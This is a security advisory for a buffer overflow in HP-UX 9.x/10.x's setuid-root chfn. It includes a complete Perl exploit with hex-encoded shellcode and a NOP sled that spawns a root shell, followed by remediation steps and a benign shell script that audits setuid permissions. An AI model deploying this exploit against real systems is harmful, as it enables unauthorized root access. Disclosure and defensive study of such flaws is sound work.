COMMAND

    chfn

SYSTEMS AFFECTED

    All platforms running HP-UX 9.x and 10.x

PROBLEM

    Due  to  insufficient  bounds  checking  on  arguments  which  are
    supplied by users, it is possible to overwrite the internal  stack
    space of the chfn program while  it is executing.  By supplying  a
    carefully designed argument to the chfn program, intruders may  be
    able to  force chfn  to execute  arbitrary commands.   As chfn  is
    setuid root, this  may allow intruders  to run arbitrary  commands
    with root privileges.  Thnx SOD for exploit.

#!/usr/bin/perl

use FileHandle;

sub h2cs {
  local($stuff)=@_;
  local($rv);
  while($stuff !~ /^$/) {
    $bob=$stuff;
    $bob =~ s/^(..).*$/$1/;
    $stuff =~ s/^..//;
    $rv.=chr(oct("0x${bob}"));
    }
  return $rv;
  }

open(PIPE,"uname -r|");
chop($rev=<PIPE>);
close(PIPE);
$rev =~ s/^.*\.(.*)\..*$/$1/;

if ($rev eq "10") {
  $offset=2070;
  $prealign="AA";
  $postalign="PPPP";
  $pcoq=h2cs("7b03A013");
  } else {
  $offset=2070;
  $prealign="AA";
  $postalign="PPPP";
  $pcoq=h2cs("7b033013");
  }

$nop=h2cs("08210280");
$code="";
$code.=h2cs("34160506"); # LDI 643,r22
$code.=h2cs("96d60534"); # SUBI 666,r22,r22
$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=h2cs("0b5a029a"); # XOR arg0,arg0,arg0
$code.=h2cs("e83f1ffd"); # BL .+8,r1
$code.=h2cs("08210280"); # NOP
$code.=h2cs("34020102"); # LDI 129,rp
$code.=h2cs("08410402"); # SUB r1,rp,rp
$code.=h2cs("60400162"); # STB r0,177(rp)
$code.=h2cs("b45a0154"); # ADDI 170,rp,arg0
$code.=h2cs("0b390299"); # XOR arg0,arg0,arg0
$code.=h2cs("0b180298"); # XOR arg0,arg0,arg0
$code.=h2cs("341604be"); # LDI 607,r22
$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=h2cs("96d60534"); # SUB 666,r22,r22
$code.=h2cs("deadcafe"); # Illegal instruction -- dump core if exec fails
$data="/bin/sh."; # Data stuff

$codedata=$code.$data;
$num=int(($offset-length($code)-length($data)-4)/4);
$pre="$nop"x$num;
$of=$prealign;
$of.=$pre.$code.$data.$postalign.$pcoq;
exec("/usr/bin/chfn","$of");

SOLUTION

    Remove setuid and non-root execute permissions,

        # chmod 500 /usr/bin/chfn

    Install chfn wrapper,

        ftp://ftp.auscert.org.au/pub/auscert/tools/overflow_wrapper.c

    Install patch.
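    A small audit helper for the "chmod 500" fix above, added here as an
    example and not part of the advisory. It parses "ls -ld" rather than
    "stat" so it runs on old HP-UX releases as well as current systems; the
    function names and the optional "fix" argument are this example's own.

```shell
# Audit helper for the chfn advisory: report whether a program still carries
# the setuid bit and, on request, apply the advisory's "chmod 500" fix.
# Uses ls -ld instead of stat so it works on old HP-UX as well as modern systems.

# Returns 0 if the file is setuid (owner-execute column shows 's' or 'S'),
# 1 otherwise (including when the file does not exist).
is_setuid() {
    mode=$(ls -ld "$1" 2>/dev/null | cut -c1-10)
    case "$mode" in
        ???[sS]??????) return 0 ;;
        *)             return 1 ;;
    esac
}

# Returns 0 when the mode is exactly what the advisory recommends:
# owner read+execute only, no setuid, nothing for group or other.
is_locked_down() {
    mode=$(ls -ld "$1" 2>/dev/null | cut -c1-10)
    [ "$mode" = "-r-x------" ]
}

# Check one binary and print a one-line verdict.  Pass "fix" as the second
# argument to apply "chmod 500" when the binary is found setuid.
# Returns 1 if the binary was setuid when checked, 0 if it was already safe.
audit_setuid_binary() {
    bin="$1"
    if is_setuid "$bin"; then
        echo "VULNERABLE: $bin is setuid"
        if [ "$2" = "fix" ]; then
            chmod 500 "$bin" && echo "FIXED: $bin now $(ls -ld "$bin" | cut -c1-10)"
        fi
        return 1
    fi
    echo "OK: $bin is not setuid"
    return 0
}

# Typical use on an affected host:  audit_setuid_binary /usr/bin/chfn fix
```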